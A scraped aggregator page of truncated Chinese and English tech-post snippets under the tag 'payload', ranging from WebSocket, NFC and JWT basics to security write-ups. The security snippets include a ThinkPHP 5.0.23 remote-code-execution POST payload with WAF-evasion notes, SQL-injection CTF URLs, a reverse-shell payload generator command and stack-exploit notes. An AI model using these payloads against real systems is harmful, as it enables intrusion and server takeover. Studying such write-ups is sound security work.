payload

how to work out payload size from html5 websocket

给你一囗甜甜゛ 提交于 2019-12-08 02:47:59
问题 how can I tell an html5 message payload length over websockets? Im aware the base protocol consists of an op code, then length is determine by the next 1 to 8 bytes, then the following values is the hashing and then the rest is payload! Im creating a java serverside application that will receivea message from a html5 client and then handle, iI can handle messages up to 256 bytes. Any help to work this out even manually would be great (i.e how to habdle the bytes that determine the payload)

使用android nfc api写NFC tag信息

半腔热情 提交于 2019-12-07 11:31:31
当前android智能机不仅能读取NFC tags数据如URL,电话号码等,而且也能使用Android NFC Api写入NFC tags。本文我们将探索如何使用Android Api去写NFC smart tags(智能标签). 何为NFC技术? 在深入研究如何在android中使用NFC前有必要了解下什么是NFC技术。 Near Field Technology(NFC)是一种建立在两个兼容设备上短距离通信技术。NFC需要其中一个设备做为信息传送方,另一个做为接收方。NFC支持两种模式将设备组合起来: 被动模式 主动模式 主NFC设备可以发送和接收并能和被动设备交换数据。被动设备可以无需电源把发送数据到其它可用的NFC设备上。一个典型的被动设备案例:NFC tag 可以作为广告系统使用。 NFC技术目前在最新的android智能手机上已经支持,并且NFC 标签 被用作激活广告,智能支付等。更重要的是更应该知道如何在android中写入NFC 标签 。 开始学习使用NFC 首先开启NFC的android app要做的就是验证NFC是存在及是否激活: 1 @Override 2 protected void onCreate(Bundle savedInstanceState) { 3 ... 4 nfcMger = new NFCManager(this); 5 .. 6 }

Get custom payload of push notification while app is running background

守給你的承諾、 提交于 2019-12-07 09:30:01
问题 Hey can anybody tell how to get custom payload of push notification when app is in background? If your app is in the background and you receive a push notification and the user taps app "View", the application is launched and application:didFinishLaunchingWithOptions: would get called. In this case we can access custom notification payload via UIApplicationLaunchOptionsRemoteNotificationKey from userInfo dictionary. If your app is in the background and you receive a push notification and the

Java反序列化漏洞CVE-2018-2628 分析

帅比萌擦擦* 提交于 2019-12-07 01:28:21
一、 前言 认识Java序列化与反序列化 定义: 序列化就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程   反序列化即逆过程,由字节流还原成对象   注: 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。 且看接下来怎么一步步揭开反序列化漏洞利用的面纱的。(小白文) 二、CVE-2018-2628反序列化漏洞详情分析 在分析这个漏洞的时候,中间也看了好多前辈们写的有关Java反序列化漏洞分析的或详细或简略或比价有深度的文章。自己也琢磨了,虽然还没有动手写漏洞利用脚本,但是基本已经了解了反序列化漏洞从发现到利用的整个过程。其中也看了ysoserial-master通用利用工具的源码来加深理解。 (1) 反序列化漏洞利用方法 1.1为了更好的了解漏洞形成的原因,跟踪了脚本抓包分析以及反编译了源码来解开对java反序列化漏洞的疑惑 这部分是参考自别人针对这个漏洞的分析: 来看看InboundMsgAbbrev中resolveProxyClass的实现,resolveProxyClass是处理rmi接口类型的,只判断了java.rmi.registry.Registry,其实随便找 一个rmi接口即可绕过。 protected Class<?> resolveProxyClass(String[] interfaces) throws

Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具

梦想的初衷 提交于 2019-12-07 01:26:41
为了方便小伙伴们使用,我导出了两个jar包,分别用于制作反弹shell的payload和测试的payload。 使用方法和利用方法请仔细看下面的截图: 1、制作反弹shell的payload并利用: 命令: java -jar makeshell.jar 你的IP 监听端口 payload名 如: java -jar makeshell.jar 202.112.221.32 8888 D:\\java\\shellpayload 1、制作POC的payload并利用: 命令: java -jar makepoc.jar 请求的URL payload名 如: java -jar makpoc.jar http://www.xxxxx.org/xxooxxooxxoo.txt D:\\java\\pocpayload 脚本下载: http://pan.baidu.com/s/1hrfjdDM 仅供运维测试漏洞,请勿非法使用,否则后果自负! 来源: CSDN 作者: aaa0404524 链接: https://blog.csdn.net/aaa0404524/article/details/50655443

实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)

强颜欢笑 提交于 2019-12-07 00:43:07
0x00 最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理, 0x01 简单的sql注入 做题的地址为: http://ctf5.shiyanbar.com/423/web/ 第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了什么 第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过 滤了,好吧来试试如何绕过吧 第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1 第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**

记一次有趣的thinkphp代码执行

不想你离开。 提交于 2019-12-06 14:58:53
0x00 前言 朋友之前给了个站,拿了很久终于拿下,简单记录一下。 0x01 基础信息 漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1 无回显,根据payload 成功判断目标thinkphp 版本应为5.0.23 有waf,waf拦截了以下内容 php标记: <?php <?= <? php 函数: base64_decode file_get_contents convert_uuencode 关键字: php:// linux disable_function禁用了以下函数 passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server php 7.1.7 (虽然 assert 函数不在disable_function中,但已经无法用 call_user_func 回调调用) 0x02 突破 现在tp 5

symfony2 form how to accept json payload from angular resource

限于喜欢 提交于 2019-12-06 13:26:11
I'm currently trying to combine a Symfony Form with angularJS ... A Service posts data to a form, that should save an entity to the database. Unfortunately, ngResource sends the data as a JSON payload, so that Symfony Forms can't process it... I tried many things on angular side, like changing the headers: headers : {'Content-Type': 'application/x-www-form-urlencoded'} I couldn't find much more on angular side, so I thought that I could find a Solution on Symfony Side. Any Idea how I could get this to work? Angular-Solutions are welcome too of course. I finally found a solution, after reading

exploit编写学习阶段性总结

我怕爱的太早我们不能终老 提交于 2019-12-06 13:15:57
exploit编写学习阶段性总结 tags: 漏洞利用 tips 0x00 跳至shellcode 现在学习的内容仅涉及利用。 已知:触发崩溃的方式 过程: 1、验证崩溃,观察是否覆盖EIP或异常链节点。 2、确定覆盖EIP或异常链节点在输入中的偏移,并验证。 3、使EIP最终跳转至payload。 跳转至payload的方法: 1、若EIP被修改时,有寄存器指向缓冲区。可使用 call/jmp [reg] , push ret 。 2、若有缓冲区范围内的地址在栈顶上方,则可通过 pop ret (SEH) 3、以上两种都可用 jmp [reg+offset] 代替(虽然这种指令不好找…) 以上方法有一个共同点:崩溃现场能够找到缓冲区内地址。(寄存器或寄存器指向的内存附近) 如果没现成的地址使用,可以自己硬编码一个。该值可能会被读入寄存器中,可能会在栈中。之后使用上面的方法跳转至payload。 某些长度下payload长度有限,而缓冲区覆盖的范围很大。此时可以在payload处写一段跳转代码,将功能代码放在缓冲区其他位置。 常用的方法有: 1、上面跳转至payload的方法。(这时自己编码,所以offset能够控制) 2、 popad + jmp esp ( jmp [esp+offset] 的情况) 3、 jmp [reg+offset] , jmp [addr] (硬编码)

【转】认识JWT

早过忘川 提交于 2019-12-06 13:07:37
1. JSON Web Token是什么 JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 2. 什么时候你应该用JSON Web Tokens 下列场景中使用JSON Web Token是很有用的: Authorization (授权) : 这是使用JWT的最常见场景。一旦用户登录,后续每个请求都将包含JWT,允许用户访问该令牌允许的路由、服务和资源。单点登录是现在广泛使用的JWT的一个特性,因为它的开销很小,并且可以轻松地跨域使用。 Information Exchange (信息交换) : 对于安全的在各方之间传输信息而言,JSON Web Tokens无疑是一种很好的方式。因为JWTs可以被签名,例如,用公钥/私钥对,你可以确定发送人就是它们所说的那个人。另外,由于签名是使用头和有效负载计算的,您还可以验证内容没有被篡改。 3. JSON Web Token的结构是什么样的 JSON Web Token由三部分组成,它们之间用圆点(.)连接。这三部分分别是: Header Payload Signature 因此,一个典型的JWT看起来是这个样子的: xxxxx.yyyyy.zzzzz 接下来,具体看一下每一部分: